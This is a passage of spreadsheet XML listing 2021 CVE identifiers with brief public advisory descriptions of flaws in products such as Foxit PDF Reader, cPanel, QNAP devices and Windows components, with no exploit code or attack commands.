  <si>
    <t>HashiCorp Vault and Vault Enterprise’s UI erroneously cached and exposed user-viewed secrets between sessions in a single shared browser. Fixed in 1.8.0 and pending 1.7.4 / 1.6.6 releases.</t>
  </si>
  <si>
    <t>CVE-2021-38555</t>
  </si>
  <si>
    <t>An XML external entity (XXE) injection vulnerability was discovered in the Any23 StreamUtils.java file and is known to affect Any23 versions &lt; 2.5. XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.</t>
  </si>
  <si>
    <t>CVE-2021-38556</t>
  </si>
  <si>
    <t>includes/configure_client.php in RaspAP 2.6.6 allows attackers to execute commands via command injection.</t>
  </si>
  <si>
    <t>CVE-2021-38557</t>
  </si>
  <si>
    <t>raspap-webgui in RaspAP 2.6.6 allows attackers to execute commands as root because of the insecure sudoers permissions. The www-data account can execute /etc/raspap/hostapd/enablelog.sh as root with no password; however, the www-data account can also overwrite /etc/raspap/hostapd/enablelog.sh with any executable content.</t>
  </si>
  <si>
    <t>CVE-2021-38559</t>
  </si>
  <si>
    <t>DigitalDruid HotelDruid 3.0.2 has an XSS vulnerability in prenota.php affecting the fineperiodo1 parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3856</t>
  </si>
  <si>
    <t>ClassLoaderTheme and ClasspathThemeResourceProviderFactory allows reading any file available as a resource to the classloader. By sending requests for theme resources with a relative path from an external HTTP client, the client will receive the content of random files if available.</t>
  </si>
  <si>
    <t>CVE-2021-38560</t>
  </si>
  <si>
    <t>Ivanti Service Manager 2021.1 allows reflected XSS via the appName parameter associated with ConfigDB calls, such as in RelocateAttachments.aspx.</t>
  </si>
  <si>
    <t>CVE-2021-38562</t>
  </si>
  <si>
    <t>Best Practical Request Tracker (RT) 4.2 before 4.2.17, 4.4 before 4.4.5, and 5.0 before 5.0.2 allows sensitive information disclosure via a timing attack against lib/RT/REST2/Middleware/Auth.pm.</t>
  </si>
  <si>
    <t>CVE-2021-38563</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PDF Reader before 11.0.1 and PDF Editor before 11.0.1. It mishandles situations in which an array size (derived from a /Size entry) is smaller than the maximum indirect object number, and thus there is an attempted incorrect array access (leading to a NULL pointer dereference, or out-of-bounds read or write).</t>
  </si>
  <si>
    <t>CVE-2021-38564</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PDF Reader before 11.0.1 and PDF Editor before 11.0.1. It allows an out-of-bounds read via util.scand.</t>
  </si>
  <si>
    <t>CVE-2021-38565</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PDF Reader before 11.0.1 and PDF Editor before 11.0.1. It allows writing to arbitrary files via submitForm.</t>
  </si>
  <si>
    <t>CVE-2021-38566</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PDF Reader before 11.0.1 and PDF Editor before 11.0.1. It allows stack consumption during recursive processing of embedded XML nodes.</t>
  </si>
  <si>
    <t>CVE-2021-38567</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit PDF Editor before 11.0.1 and PDF Reader before 11.0.1 on macOS. It mishandles missing dictionary entries, leading to a NULL pointer dereference, aka CNVD-C-2021-95204.</t>
  </si>
  <si>
    <t>CVE-2021-38568</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows memory corruption during conversion of a PDF document to a different document format.</t>
  </si>
  <si>
    <t>CVE-2021-38569</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows stack consumption via recursive function calls during the handling of XFA forms or link objects.</t>
  </si>
  <si>
    <t>CVE-2021-3857</t>
  </si>
  <si>
    <t>CVE-2021-38570</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows attackers to delete arbitrary files (during uninstallation) via a symlink.</t>
  </si>
  <si>
    <t>CVE-2021-38571</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows DLL hijacking, aka CNVD-C-2021-68000 and CNVD-C-2021-68502.</t>
  </si>
  <si>
    <t>CVE-2021-38572</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows writing to arbitrary files because the extractPages pathname is not validated.</t>
  </si>
  <si>
    <t>CVE-2021-38573</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows writing to arbitrary files because a CombineFiles pathname is not validated.</t>
  </si>
  <si>
    <t>CVE-2021-38574</t>
  </si>
  <si>
    <t>An issue was discovered in Foxit Reader and PhantomPDF before 10.1.4. It allows SQL Injection via crafted data at the end of a string.</t>
  </si>
  <si>
    <t>CVE-2021-38575</t>
  </si>
  <si>
    <t>NetworkPkg/IScsiDxe has remotely exploitable buffer overflows.</t>
  </si>
  <si>
    <t>CVE-2021-38576</t>
  </si>
  <si>
    <t>A BIOS bug in firmware for a particular PC model leaves the Platform authorization value empty. This can be used to permanently brick the TPM in multiple ways, as well as to non-permanently DoS the system.</t>
  </si>
  <si>
    <t>CVE-2021-38577</t>
  </si>
  <si>
    <t>Heap Overflow in BaseBmpSupportLib.</t>
  </si>
  <si>
    <t>CVE-2021-38578</t>
  </si>
  <si>
    <t>Existing CommBuffer checks in SmmEntryPoint will not catch underflow when computing BufferSize.</t>
  </si>
  <si>
    <t>CVE-2021-3858</t>
  </si>
  <si>
    <t>snipe-it is vulnerable to Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>CVE-2021-38583</t>
  </si>
  <si>
    <t>openBaraza HCM 3.1.6 does not properly neutralize user-controllable input, which allows reflected cross-site scripting (XSS) on multiple pages: hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view= and data=).</t>
  </si>
  <si>
    <t>CVE-2021-38584</t>
  </si>
  <si>
    <t>The WHM Locale Upload feature in cPanel before 98.0.1 allows XXE attacks (SEC-585).</t>
  </si>
  <si>
    <t>CVE-2021-38585</t>
  </si>
  <si>
    <t>The WHM Locale Upload feature in cPanel before 98.0.1 allows unserialization attacks (SEC-585).</t>
  </si>
  <si>
    <t>CVE-2021-38586</t>
  </si>
  <si>
    <t>In cPanel before 98.0.1, /scripts/cpan_config performs unsafe operations on files (SEC-589).</t>
  </si>
  <si>
    <t>CVE-2021-38587</t>
  </si>
  <si>
    <t>In cPanel before 96.0.13, scripts/fix-cpanel-perl mishandles the creation of temporary files (SEC-586).</t>
  </si>
  <si>
    <t>CVE-2021-38588</t>
  </si>
  <si>
    <t>In cPanel before 96.0.13, fix_cpanel_perl lacks verification of the integrity of downloads (SEC-587).</t>
  </si>
  <si>
    <t>CVE-2021-38589</t>
  </si>
  <si>
    <t>In cPanel before 96.0.13, scripts/fix-cpanel-perl does not properly restrict the overwriting of files (SEC-588).</t>
  </si>
  <si>
    <t>CVE-2021-3859</t>
  </si>
  <si>
    <t>A flaw was found in Undertow that tripped the client-side invocation timeout with certain calls made over HTTP2. This flaw allows an attacker to carry out denial of service attacks.</t>
  </si>
  <si>
    <t>CVE-2021-38590</t>
  </si>
  <si>
    <t>In cPanel before 96.0.8, weak permissions on web stats can lead to information disclosure (SEC-584).</t>
  </si>
  <si>
    <t>CVE-2021-38591</t>
  </si>
  <si>
    <t>An issue was discovered on LG mobile devices with Android OS P and Q software for mt6762/mt6765/mt6883. Attackers can change some of the NvRAM content by leveraging the misconfiguration of a debug command. The LG ID is LVE-SMP-210005 (August 2021).</t>
  </si>
  <si>
    <t>CVE-2021-38592</t>
  </si>
  <si>
    <t>Wasm3 0.5.0 has a heap-based buffer overflow in op_Const64 (called from EvaluateExpression and m3_LoadModule).</t>
  </si>
  <si>
    <t>CVE-2021-38593</t>
  </si>
  <si>
    <t>Qt 5.x before 5.15.6 and 6.x through 6.1.2 has an out-of-bounds write in QOutlineMapper::convertPath (called from QRasterPaintEngine::fill and QPaintEngineEx::stroke).</t>
  </si>
  <si>
    <t>CVE-2021-38597</t>
  </si>
  <si>
    <t>wolfSSL before 4.8.1 incorrectly skips OCSP verification in certain situations of irrelevant response data that contains the NoCheck extension.</t>
  </si>
  <si>
    <t>CVE-2021-38598</t>
  </si>
  <si>
    <t>OpenStack Neutron before 16.4.1, 17.x before 17.1.3, and 18.0.0 allows hardware address impersonation when the linuxbridge driver with ebtables-nft is used on a Netfilter-based platform. By sending carefully crafted packets, anyone in control of a server instance connected to the virtual switch can impersonate the hardware addresses of other systems on the network, resulting in denial of service or in some cases possibly interception of traffic intended for other destinations.</t>
  </si>
  <si>
    <t>CVE-2021-38599</t>
  </si>
  <si>
    <t>WAL-G before 1.1, when a non-libsodium build (e.g., one of the official binary releases published as GitHub Releases) is used, silently ignores the libsodium encryption key and uploads cleartext backups. This is arguably a Principle of Least Surprise violation because "the user likely wanted to encrypt all file activity."</t>
  </si>
  <si>
    <t>CVE-2021-3860</t>
  </si>
  <si>
    <t>JFrog Artifactory before 7.25.4 (Enterprise+ deployments only), is vulnerable to Blind SQL Injection by a low privileged authenticated user due to incomplete validation when performing an SQL query.</t>
  </si>
  <si>
    <t>CVE-2021-38602</t>
  </si>
  <si>
    <t>PluXML 5.8.7 allows Article Editing stored XSS via Headline or Content.</t>
  </si>
  <si>
    <t>CVE-2021-38603</t>
  </si>
  <si>
    <t>PluXML 5.8.7 allows core/admin/profil.php stored XSS via the Information field.</t>
  </si>
  <si>
    <t>CVE-2021-38604</t>
  </si>
  <si>
    <t>In librt in the GNU C Library (aka glibc) through 2.34, sysdeps/unix/sysv/linux/mq_notify.c mishandles certain NOTIFY_REMOVED data, leading to a NULL pointer dereference. NOTE: this vulnerability was introduced as a side effect of the CVE-2021-33574 fix.</t>
  </si>
  <si>
    <t>CVE-2021-38606</t>
  </si>
  <si>
    <t>reNgine through 0.5 relies on a predictable directory name.</t>
  </si>
  <si>
    <t>CVE-2021-38607</t>
  </si>
  <si>
    <t>Crocoblock JetEngine before 2.6.1 allows XSS by remote authenticated users via a custom form input.</t>
  </si>
  <si>
    <t>CVE-2021-38608</t>
  </si>
  <si>
    <t>Incorrect Access Control in Tranquil WAPT Enterprise - before 1.8.2.7373 and before 2.0.0.9450 allows guest OS users to escalate privileges via WAPT Agent.</t>
  </si>
  <si>
    <t>CVE-2021-3861</t>
  </si>
  <si>
    <t>The RNDIS USB device class includes a buffer overflow vulnerability. Zephyr versions &gt;= v2.6.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-hvfp-w4h8-gxvj</t>
  </si>
  <si>
    <t>CVE-2021-38611</t>
  </si>
  <si>
    <t>A command-injection vulnerability in the Image Upload function of the NASCENT RemKon Device Manager 4.0.0.0 allows attackers to execute arbitrary commands, as root, via shell metacharacters in the filename parameter to assets/index.php.</t>
  </si>
  <si>
    <t>CVE-2021-38612</t>
  </si>
  <si>
    <t>In NASCENT RemKon Device Manager 4.0.0.0, a Directory Traversal vulnerability in a log-reading function in maintenance/readLog.php allows an attacker to read any file via a specialized URL.</t>
  </si>
  <si>
    <t>CVE-2021-38613</t>
  </si>
  <si>
    <t>The assets/index.php Image Upload feature of the NASCENT RemKon Device Manager 4.0.0.0 allows attackers to upload any code to the target system and achieve remote code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38614</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** Polipo through 1.1.1, when NDEBUG is used, allows a heap-based buffer overflow during parsing of a Range header. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.</t>
  </si>
  <si>
    <t>CVE-2021-38615</t>
  </si>
  <si>
    <t>In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/sso/config/ SSO configuration endpoint allows any logged-in user (guest, standard, or admin) to view and modify information.</t>
  </si>
  <si>
    <t>CVE-2021-38616</t>
  </si>
  <si>
    <t>In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/{user-guid}/ user edition endpoint could permit any logged-in user to increase their own permissions via a user_permissions array in a PATCH request. A guest user could modify other users' profiles and much more.</t>
  </si>
  <si>
    <t>CVE-2021-38617</t>
  </si>
  <si>
    <t>In Eigen NLP 3.10.1, a lack of access control on the /auth/v1/user/ user creation endpoint allows a standard user to create a super user account with a defined password. This directly leads to privilege escalation.</t>
  </si>
  <si>
    <t>CVE-2021-38618</t>
  </si>
  <si>
    <t>In GFOS Workforce Management 4.8.272.1, the login page of application is prone to authentication bypass, allowing anyone (who knows a user's credentials except the password) to get access to an account. This occurs because of JSESSIONID mismanagement.</t>
  </si>
  <si>
    <t>CVE-2021-38619</t>
  </si>
  <si>
    <t>openBaraza HCM 3.1.6 does not properly neutralize user-controllable input: an unauthenticated remote attacker can conduct a stored cross-site scripting (XSS) attack against an administrative user from hr/subscription.jsp and hr/application.jsp and and hr/index.jsp (with view=).</t>
  </si>
  <si>
    <t>CVE-2021-3862</t>
  </si>
  <si>
    <t>icecoder is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-38621</t>
  </si>
  <si>
    <t>The remove API in v1/controller/cloudStorage/alibabaCloud/remove/index.ts in netless Agora Flat Server before 2021-07-30 mishandles file ownership.</t>
  </si>
  <si>
    <t>CVE-2021-38623</t>
  </si>
  <si>
    <t>The deferred_image_processing (aka Deferred image processing) extension before 1.0.2 for TYPO3 allows Denial of Service via the FAL API because of /var/transient disk consumption.</t>
  </si>
  <si>
    <t>CVE-2021-38624</t>
  </si>
  <si>
    <t>Windows Key Storage Provider Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38625</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38626.</t>
  </si>
  <si>
    <t>CVE-2021-38626</t>
  </si>
  <si>
    <t>Windows Kernel Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38625.</t>
  </si>
  <si>
    <t>CVE-2021-38628</t>
  </si>
  <si>
    <t>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38638.</t>
  </si>
  <si>
    <t>CVE-2021-38629</t>
  </si>
  <si>
    <t>Windows Ancillary Function Driver for WinSock Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-3863</t>
  </si>
  <si>
    <t>snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')</t>
  </si>
  <si>
    <t>CVE-2021-38630</t>
  </si>
  <si>
    <t>Windows Event Tracing Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36964.</t>
  </si>
  <si>
    <t>CVE-2021-38631</t>
  </si>
  <si>
    <t>Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-41371.</t>
  </si>
  <si>
    <t>CVE-2021-38632</t>
  </si>
  <si>
    <t>BitLocker Security Feature Bypass Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38633</t>
  </si>
  <si>
    <t>Windows Common Log File System Driver Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36955, CVE-2021-36963.</t>
  </si>
  <si>
    <t>CVE-2021-38634</t>
  </si>
  <si>
    <t>Microsoft Windows Update Client Elevation of Privilege Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38635</t>
  </si>
  <si>
    <t>Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-36969, CVE-2021-38636.</t>
  </si>
  <si>
    <t>CVE-2021-38636</t>
  </si>
  <si>
    <t>Windows Redirected Drive Buffering SubSystem Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-36969, CVE-2021-38635.</t>
  </si>
  <si>
    <t>CVE-2021-38637</t>
  </si>
  <si>
    <t>Windows Storage Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38638</t>
  </si>
  <si>
    <t>Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38628.</t>
  </si>
  <si>
    <t>CVE-2021-38639</t>
  </si>
  <si>
    <t>Win32k Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-36975.</t>
  </si>
  <si>
    <t>CVE-2021-3864</t>
  </si>
  <si>
    <t>A flaw was found in the way the dumpable flag setting was handled when certain SUID binaries executed its descendants. The prerequisite is a SUID binary that sets real UID equal to effective UID, and real GID equal to effective GID. The descendant will then have a dumpable value set to 1. As a result, if the descendant process crashes and core_pattern is set to a relative value, its core dump is stored in the current directory with uid:gid permissions. An unprivileged local user with eligible root SUID binary could use this flaw to place core dumps into root-owned directories, potentially resulting in escalation of privileges.</t>
  </si>
  <si>
    <t>CVE-2021-38641</t>
  </si>
  <si>
    <t>CVE-2021-38642</t>
  </si>
  <si>
    <t>Microsoft Edge for iOS Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38644</t>
  </si>
  <si>
    <t>Microsoft MPEG-2 Video Extension Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38645</t>
  </si>
  <si>
    <t>Open Management Infrastructure Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38648, CVE-2021-38649.</t>
  </si>
  <si>
    <t>CVE-2021-38646</t>
  </si>
  <si>
    <t>CVE-2021-38647</t>
  </si>
  <si>
    <t>Open Management Infrastructure Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38648</t>
  </si>
  <si>
    <t>Open Management Infrastructure Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38645, CVE-2021-38649.</t>
  </si>
  <si>
    <t>CVE-2021-38649</t>
  </si>
  <si>
    <t>Open Management Infrastructure Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38645, CVE-2021-38648.</t>
  </si>
  <si>
    <t>CVE-2021-38650</t>
  </si>
  <si>
    <t>Microsoft Office Spoofing Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38651</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-38652.</t>
  </si>
  <si>
    <t>CVE-2021-38652</t>
  </si>
  <si>
    <t>Microsoft SharePoint Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-38651.</t>
  </si>
  <si>
    <t>CVE-2021-38653</t>
  </si>
  <si>
    <t>Microsoft Office Visio Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-38654.</t>
  </si>
  <si>
    <t>CVE-2021-38654</t>
  </si>
  <si>
    <t>Microsoft Office Visio Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-38653.</t>
  </si>
  <si>
    <t>CVE-2021-38655</t>
  </si>
  <si>
    <t>CVE-2021-38656</t>
  </si>
  <si>
    <t>CVE-2021-38657</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Component Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38658</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-38660.</t>
  </si>
  <si>
    <t>CVE-2021-38659</t>
  </si>
  <si>
    <t>CVE-2021-3866</t>
  </si>
  <si>
    <t>Cross-site Scripting (XSS) - Stored in GitHub repository zulip/zulip more than and including 44f935695d452cc3fb16845a0c6af710438b153d and prior to 3eb2791c3e9695f7d37ffe84e0c2184fae665cb6.</t>
  </si>
  <si>
    <t>CVE-2021-38660</t>
  </si>
  <si>
    <t>Microsoft Office Graphics Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-38658.</t>
  </si>
  <si>
    <t>CVE-2021-38661</t>
  </si>
  <si>
    <t>HEVC Video Extensions Remote Code Execution Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38662</t>
  </si>
  <si>
    <t>Windows Fast FAT File System Driver Information Disclosure Vulnerability This CVE ID is unique from CVE-2021-41343.</t>
  </si>
  <si>
    <t>CVE-2021-38663</t>
  </si>
  <si>
    <t>Windows exFAT File System Information Disclosure Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38665</t>
  </si>
  <si>
    <t>CVE-2021-38666</t>
  </si>
  <si>
    <t>CVE-2021-38667</t>
  </si>
  <si>
    <t>Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38671, CVE-2021-40447.</t>
  </si>
  <si>
    <t>CVE-2021-38669</t>
  </si>
  <si>
    <t>Microsoft Edge (Chromium-based) Tampering Vulnerability</t>
  </si>
  <si>
    <t>CVE-2021-38671</t>
  </si>
  <si>
    <t>Windows Print Spooler Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-38667, CVE-2021-40447.</t>
  </si>
  <si>
    <t>CVE-2021-38672</t>
  </si>
  <si>
    <t>Windows Hyper-V Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-40461.</t>
  </si>
  <si>
    <t>CVE-2021-38674</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QTS, QuTS hero and QuTScloud. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of QTS, QuTS hero and QuTScloud: QuTS hero h4.5.4.1771 build 20210825 and later QTS 4.5.4.1787 build 20210910 and later QuTScloud c4.5.7.1864 and later</t>
  </si>
  <si>
    <t>CVE-2021-38675</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Image2PDF. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Image2PDF: Image2PDF 2.1.5 ( 2021/08/17 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-38677</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running QcalAgent. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of QcalAgent: QcalAgent 1.1.7 and later</t>
  </si>
  <si>
    <t>CVE-2021-38678</t>
  </si>
  <si>
    <t>An open redirect vulnerability has been reported to affect QNAP device running QcalAgent. If exploited, this vulnerability allows attackers to redirect users to an untrusted page that contains malware. We have already fixed this vulnerability in the following versions of QcalAgent: QcalAgent 1.1.7 and later</t>
  </si>
  <si>
    <t>CVE-2021-38679</t>
  </si>
  <si>
    <t>An improper authentication vulnerability has been reported to affect QNAP NAS running Kazoo Server. If exploited, this vulnerability allows attackers to compromise the security of the system. We have already fixed this vulnerability in the following versions of Kazoo Server: Kazoo Server 4.11.22 and later</t>
  </si>
  <si>
    <t>CVE-2021-38680</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability has been reported to affect QNAP device running Kazoo Server. If exploited, this vulnerability allows remote attackers to inject malicious code. We have already fixed this vulnerability in the following versions of Kazoo Server: Kazoo Server 4.11.20 and later</t>
  </si>
  <si>
    <t>CVE-2021-38681</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability has been reported to affect QNAP NAS running Ragic Cloud DB. If exploited, this vulnerability allows remote attackers to inject malicious code. QNAP have already disabled and removed Ragic Cloud DB from the QNAP App Center, pending a security patch from Ragic.</t>
  </si>
  <si>
    <t>CVE-2021-38682</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP device running QVR Elite, QVR Pro, QVR Guard. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of QVR Elite, QVR Pro, QVR Guard: QuTS hero h5.0.0: QVR Elite 2.1.4.0 (2021/12/06) and later QuTS hero h4.5.4: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 5.0.0: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 4.5.4: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 4.5.4: QVR Pro 2.1.3.0 (2021/12/06) and later QTS 5.0.0: QVR Pro 2.1.3.0 (2021/12/06) and later QTS 4.5.4: QVR Guard 2.1.3.0 and later QTS 5.0.0: QVR Guard 2.1.3.0 and later</t>
  </si>
  <si>
    <t>CVE-2021-38684</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP NAS running Multimedia Console. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of Multimedia Console: Multimedia Console 1.4.3 ( 2021/10/05 ) and later Multimedia Console 1.5.3 ( 2021/10/05 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-38685</t>
  </si>
  <si>
    <t>A command injection vulnerability has been reported to affect QNAP device, VioStor. If exploited, this vulnerability allows remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later</t>
  </si>
  <si>
    <t>CVE-2021-38686</t>
  </si>
  <si>
    <t>An improper authentication vulnerability has been reported to affect QNAP device, VioStor. If exploited, this vulnerability allows attackers to compromise the security of the system. We have already fixed this vulnerability in the following versions of QVR: QVR FW 5.1.6 build 20211109 and later</t>
  </si>
  <si>
    <t>CVE-2021-38687</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP NAS running Surveillance Station. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of Surveillance Station: QTS 5.0.0 (64 bit): Surveillance Station 5.2.0.4.2 ( 2021/10/26 ) and later QTS 5.0.0 (32 bit): Surveillance Station 5.2.0.3.2 ( 2021/10/26 ) and later QTS 4.3.6 (64 bit): Surveillance Station 5.1.5.4.6 ( 2021/10/26 ) and later QTS 4.3.6 (32 bit): Surveillance Station 5.1.5.3.6 ( 2021/10/26 ) and later QTS 4.3.3: Surveillance Station 5.1.5.3.6 ( 2021/10/26 ) and later</t>
  </si>
  <si>
    <t>CVE-2021-38688</t>
  </si>
  <si>
    <t>An improper authentication vulnerability has been reported to affect Android App Qfile. If exploited, this vulnerability allows attackers to compromise app and access information We have already fixed this vulnerability in the following versions of Qfile: Qfile 3.0.0.1105 and later</t>
  </si>
  <si>
    <t>CVE-2021-38689</t>
  </si>
  <si>
    <t>A stack buffer overflow vulnerability has been reported to affect QNAP device running QVR Elite, QVR Pro, QVR Guard. If exploited, this vulnerability allows attackers to execute arbitrary code. We have already fixed this vulnerability in the following versions of QVR Elite, QVR Pro, QVR Guard: QuTS hero h5.0.0: QVR Elite 2.1.4.0 (2021/12/06) and later QuTS hero h4.5.4: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 5.0.0: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 4.5.4: QVR Elite 2.1.4.0 (2021/12/06) and later QTS 4.5.4: QVR Pro 2.1.3.0 (2021/12/06) and later QTS 5.0.0: QVR Pro 2.1.3.0 (2021/12/06) and later QTS 4.5.4: QVR Guard 2.1.3.0 (2021/12/06) and later QTS 5.0.0: QVR Guard 2.1.3.0 (2021/12/06) and later</t>
  </si>
  <si>
    <t>CVE-2021-3869</t>
  </si>
  <si>
    <t>corenlp is vulnerable to Improper Restriction of XML External Entity Reference</t>
  </si>
  <si>
    <t>CVE-2021-38690</t>
  </si>
  <si>
    <t>CVE-2021-38691</t>
  </si>
  <si>
    <t>CVE-2021-38692</t>
  </si>
  <si>
    <t>CVE-2021-38693</t>
  </si>
  <si>
    <t>A path traversal vulnerability has been reported to affect QNAP device running QuTScloud, QuTS hero, QTS, QVR Pro Appliance. If exploited, this vulnerability allows attackers to read the contents of unexpected files and expose sensitive data. We have already fixed this vulnerability in the following versions of QuTScloud, QuTS hero, QTS, QVR Pro Appliance: QuTScloud c5.0.1.1949 and later QuTS hero h5.0.0.1949 build 20220215 and later QuTS hero h4.5.4.1951 build 20220218 and later QTS 5.0.0.1986 build 20220324 and later QTS 4.5.4.1991 build 20220329 and later</t>
  </si>
  <si>
    <t>CVE-2021-38694</t>
  </si>
  <si>
    <t>SoftVibe SARABAN for INFOMA 1.1 allows SQL Injection.</t>
  </si>
  <si>
    <t>CVE-2021-38695</t>
  </si>
  <si>
    <t>SoftVibe SARABAN for INFOMA 1.1 is vulnerable to stored cross-site scripting (XSS) that allows users to store scripts in certain fields (e.g. subject, description) of the document form.</t>
  </si>
  <si>
    <t>CVE-2021-38696</t>
  </si>
  <si>
    <t>SoftVibe SARABAN for INFOMA 1.1 has Incorrect Access Control vulnerability, that allows attackers to access signature files on the application without any authentication.</t>
  </si>
  <si>
    <t>CVE-2021-38697</t>
  </si>
  <si>
    <t>SoftVibe SARABAN for INFOMA 1.1 allows Unauthenticated unrestricted File Upload, that allows attackers to upload files with any file extension which can lead to arbitrary code execution.</t>
  </si>
  <si>
    <t>CVE-2021-38698</t>
  </si>
  <si>
    <t>HashiCorp Consul and Consul Enterprise 1.10.1 Txn.Apply endpoint allowed services to register proxies for other services, enabling access to service traffic. Fixed in 1.8.15, 1.9.9 and 1.10.2.</t>
  </si>
  <si>
    <t>CVE-2021-38699</t>
  </si>
  <si>
    <t>TastyIgniter 3.0.7 allows XSS via /account, /reservation, /admin/dashboard, and /admin/system_logs.</t>
  </si>
  <si>
    <t>CVE-2021-38701</t>
  </si>
  <si>
    <t>Certain Motorola Solutions Avigilon devices allow XSS in the administrative UI. This affects T200/201 before 4.10.0.68; T290 before 4.4.0.80; T008 before 2.2.0.86; T205 before 4.12.0.62; T204 before 3.28.0.166; and T100, T101, T102, and T103 before 2.6.0.180.</t>
  </si>
  <si>
    <t>CVE-2021-38702</t>
  </si>
  <si>
    <t>Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow tweb/ft.php?u=[XSS] attacks.</t>
  </si>
  <si>
    <t>CVE-2021-38703</t>
  </si>
  <si>
